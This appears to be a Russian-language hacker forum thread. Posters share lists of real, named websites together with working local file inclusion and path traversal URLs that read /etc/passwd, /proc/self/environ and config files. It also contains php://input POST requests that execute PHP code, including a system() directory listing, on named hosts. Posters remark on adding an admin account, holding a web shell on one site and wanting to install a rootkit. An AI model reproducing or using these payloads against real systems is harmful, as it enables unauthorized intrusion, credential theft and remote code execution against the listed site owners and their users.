Code: http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
Code: http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ Code: http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php для последнего: https://forum.antichat.ru/showthread.php?t=71111 можно админа добавить и тупо под ним зайти
php://input выполнение произвольного php - кода, редко вижу. итак, выполняем следующие пост-запросы: Code: POST /index.php?link=php://input HTTP/1.1 Host: www.alternativeautosource.net Content-Length: 19 <?php phpinfo(); ?> Code: POST /lang_de/main.php?view=php://input HTTP/1.1 Host: www.galvania.ca Content-Length: 19 <?php phpinfo(); ?> Code: POST /page_en.php?link=php://input HTTP/1.1 Host: www.rochelle.cz Content-Length: 19 <?php phpinfo(); ?> и видим PHPINFO серверов Code: POST /WWW/main.php?CONTENT=php://input HTTP/1.1 Host: polyplast-mainz.de Content-Length: 27 <?php system("ls -lia"); ?> а тут листинг директории))
HTML: http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTML: http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTML: http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
Один из крупнейших порталов по теме образования в Латвии : Code: http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00
Code: http://www.hyaffiliates.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://pheromore.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.4xwins.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.blastarticles.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.attractingabundance.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.parentcoachplan.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue
http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ Кому интересно там есть шелл, но немогу rootkit поставить нет еще сплоитов
http://wierzba.wzks.uj.edu.pl/~dymet/zarty/index.php?go=/etc/passwd%00 http://www.fav.co.il/index.php?dir=app_sites&page=../../../../../../../etc/hosts%00
http://www.equinix.com/download.php?file=../../../../../../../../../../../../../etc/passwd http://www.hrcpa.com/press/index.php?file=../../../../../../../../../../etc/passwd (--> исходники)
http://www.e-ntech.com/index.php?page=../../../../../../../../../../etc/passwd http://www.hiro-seiko.com/index.php?page=../../../../../../../../../../etc/passwd http://www.mitorosso.com/index.php?p=../../../../../../../../../../etc/passwd http://www.maxparts.ru/index.php?page=../../../../../../../../../../etc/passwd http://athomebirmingham.com/index.php?p=../../../../../../../../../../etc/passwd http://www.myspacegraphicshelper.com/index.php?page=../../../../../../../../../../etc/passwd http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../etc/passwd http://www.amarc.org/index.php?p=../../../../../../../../../../etc/passwd http://www.madrid21comunidad.fida.es/index.php?pagina=../../../../../../../../../../proc/self/environ удачи
PR - 1 Code: http://www.4kidsinpa.com/index.php?option=com_jesubmit&view=../../../../../../../../../etc/passwd%00 Code: http://www.andycon.net/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd PR - 2 Code: http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00 PR - 4 Code: http://www.kommunisten.de/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 5 Code: http://www.armnn.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.teabagfree.com/index.php/events/day.listevents/2009/11/19/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 3 Code: http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 1 Code: http://borchardtbrothers.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.oranjportal.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.aliveinchrist.org/index.php/templates/templates/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.rhianna.ro/index.php?page=../../../../../../../../../../proc/self/environ http://www.vapnet.com.br/index.php?pagina=../../../../../../../../../../proc/self/status http://www.mutokukai.ru/iframe.php?target=../../../../../../../../../../etc/passwd
http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.popular-articles.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.kucha-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.articles-top.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.articlesgallery.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.top-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://monsterspray.biz/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00